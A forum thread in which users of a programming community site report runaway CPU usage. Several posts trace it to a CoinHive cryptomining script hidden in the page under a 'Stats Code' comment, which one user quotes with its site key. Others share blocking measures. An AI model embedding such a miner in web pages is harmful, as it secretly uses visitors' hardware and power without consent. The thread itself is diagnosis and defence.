Default Site making my I7 running at 100%

Since today i noticed that opening xtremevbtalk in Firefox, Chrome and Edge will make my I7 work for its money... It runs at 100% CPU. Any one else has this problem as well?

Confirmed on Firefox. 99%-100% utilization drops to < 2% when I close this sites tab.

Same here on Win10 64b and latest Chrome.
Even when running AdBlock still have >98%

Maybe the site is running a BitCoin Miner in the background??

Same here: Firefox 55.0.3 (64 bit), Windows 10 = 97.whatever% CPU utilization.

Maybe it's time to close this site.
I'm visiting XTremeVBTalk everyday just for some basic moderating actions.
But the last days my CPU is exploding.

I've flagged this upstream for action, so we will have to wait and see what happens.

I forgot that I had left a tab open for this site and came back later to hear my PC fans running at max. Normally only does that when I intentionally load it with multiple over-night math/physics jobs.

Indeed a bitcoin miner running in the background
Code:
<!-- Stats Code -->
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
<!--
var miner = new CoinHive.Anonymous('e8mk3MNha5cPeCyyRvy4aEj2roQ48shc');
miner.start();
-->
</script>
<!-- End Stats Code -->
That's it for me.

At this point there is no way to tell if this was intentional or if the site was hacked, as either could be the case.

See here:

Showtime Uses Online Viewers' CPUs To Mine Cryptocurrency

In any case, I will not be using this site until the issue is resolved to my satisfaction.

In the meanwhile I installed an AntiMiner extension for Chrome, to prevent my CPU from exploding

Like CK I will only visit once per day to check whether the mining scripts have been removed. Until then, no moderating tasks from my side.

Site seems normal (using only 0-1% CPU) to me now, but not sure?

That is because I'm now running Firefox Quantum beta with 'AdBlock' installed (as 'AdBlock Plus' is not yet compatible with Quantum).

The problem is that 3rd party advertising sites seem incredibly vulnerable to hacking and infections of this kind and they don't seem to care. Lots of web secretaries are relying on massive bundles of crap like jQuery and often get an infected copy, spreading the curse like diseased bees.

The web is plagued by both malware and incompetent "developers."

I read somewhere that some version of AdBlock also block these mining scripts.

@dile: it's not hidden in some advertisement part of the scripts, just plain in sight.

This site isn't the only one that seems to exploid this trick....
(Site is in dutch, sorry)
https://tweakers.net/nieuws/130051/w...ingscript.html

But I'm not sure why, it doesn't seem to deliver much in terms of money.

https://medium.com/@MaxenceCornet/co...r-806f7024cde8

To be honnest, i think i would do more harm then good in terms of users leaving the site... But thats just my thought...

@flyguy, thanks for the tip about the addin... works like a charm

A month has passed and nothing changed.
I don't think anyone from MASMedia pays attention to this site.
So why should we care if they don't care.

I had hoped to be able publicly post new interesting material on this site, but would be too ashamed to have anyone from the outside come visit. So I'm starting a Google Group instead.

I will post this, though...
If you already have AdBlock Plus installed on Firefox Quantum (etc.): abp:subscribe?location=https%3A//raw...t&title=NoCoin

I've noticed this a couple of times on visiting, even as a guest, page takes ages to load, and maxes my i7 out, which on a laptop is a problem, causes lots of heat, it's caused me not to stay.

worked out this morning, disable javascript and it kills it

(using i7 laptop, Win 7 Ultimate and Iron browser)

ohh, and adblockplus doesn't stop it on it's own, will try the thing above
